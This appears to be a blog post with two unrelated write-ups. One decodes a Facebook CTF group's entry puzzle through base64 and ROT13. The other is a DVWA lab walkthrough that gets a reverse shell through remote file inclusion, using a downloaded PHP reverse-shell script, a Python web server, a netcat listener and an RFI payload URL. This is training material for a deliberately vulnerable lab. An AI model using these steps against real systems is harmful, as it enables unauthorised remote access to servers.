The entry challenge for the Facebook group was so remarkable that I wished to do a write-up.

So after requesting to join, they will require a few questions to answer:

After answering these questions, your main hurdle is that CTF challenge:

So you have to decode this encoded string of text in order to join. If you can't get the flag, they will not approve your request.

Step 1 - Decoding the string

In this step you will decode this piece of string, but how do you determine the algorithm?

aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L2RMZWR6MnVXCg==

I'm sure there are some tools out there that will tell you what format this is. But from experience I can tell, it's a base64 encoded text.

A Base64 number format has 64 symbols in it.

• 10 numbers 0-9
• 26 lowercase letters a-z
• 26 uppercase letters A-Z
• 2 extra symbols + and /

You can see the string has a mix of upper and lower case letters, as well as letters up to Z. So that's the first way to identify that it's a base64 encoded text.

The next obvious feature of base64 is the ending == part.

The character count of a base64 string will always be divisible by 4.

If there are fewer characters, the algorithm will add one, two, or three additional = at the end as padding.

So a base64 encoded string will often come with a =, ==, or === at the end.

Decoding base64 text

To decode the text, you can take help from one of the many online base64 decoders out there. This is what I have done for a long time.

You can also decode from your Linux computer with the built in base64 package.

Save the string into a text file called ctfbangladesh.txt and run this command:

base64 -d ctfbangladesh.txt

The decoded string is a link to a pastebin site.

Step 2 - Decoding the pastebin text

In this step you will further decode the text found in the pastebin site.

Visit the pastebin URL you found in the last step, and you will see the following text:

Looks like it's the flag, but the text is mixed up.

The hint says Rotten Food.

Now if you have taken any beginner-level cryptography lessons, you will know that it's some kind of Ceaser cipher.

I have done a few basic Crypto CTFs and came across the ROT13 algorithm. For this reason, I know they are talking about the ROT algorithm. It could be ROT13 because it's the most popular one out there.

The ROT13 website should help you decode the piece of string

After decoding, you will see the flag that looks like the flag format they asked for.

Submit this flag and hopefully, you will be granted access to this CTF group in Bangladesh.

That's all folks!

http://dvwa.example.com/vulnerabilities/fi/?page=http://127.0.0.1:8000/shell.php

^Here http://dvwa.example.com is the local web URL I configured into my /etc/hosts configuration file. For you, it maybe something else, so change that part.

Step #1 Download the shell script

Here you will download a basic reverse shell PHP script. Found one doing a Google search:

wget the file into desktop for now,

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

Rename the file to make it easy to reference:

mv php-reverse-shell.php shell.php

Make a note of the $port and $ip of the shell.php file. For now, it's okay to leave them default to 1234 because we'll do everything locally now.

Step #2 Create a Python Server

In this step, you will create a Python server to host the remote shell file.

The following code creates a Python server on port 8000. Make sure to run this server in the same directory where you saved the shell.php file.

python3 -m http.server 8000

Now if you go to http://127.0.0.1:8000/ you will see the shell.php which you will include in the next step.

Step #3 Get the Reverse Shell

In this step, you will create a new server for the reverse shell connection.

Run the following NetCat command to spin up a new server on port 1234:

nc -nvlp 1234

The port 1234 is the same port that was specified in the shell.php file. When you will do the remote file inclusion, the script in the shell.php will instruct the system to create a new shell and mirror all the input and output to this server.

For the time being, we will call this the NetCat server.

Include The Remote File

Add the public URL of the shell.php into the end of the query string and visit the page to establish a reverse shell connection:

http://dvwa.example.com/vulnerabilities/fi/?page=http://127.0.0.1:8000/shell.php

Now come back to your NetCat server, and you will see the $ to indicate that you have successfully established a reverse shell.

You can now enter and browse the file system using the new shell.

After getting a reverse shell, the next step would be to do privilege escalation for further exploitation.

Credits:

• CryptoCat on DVWA LFI/RFI Walkthrough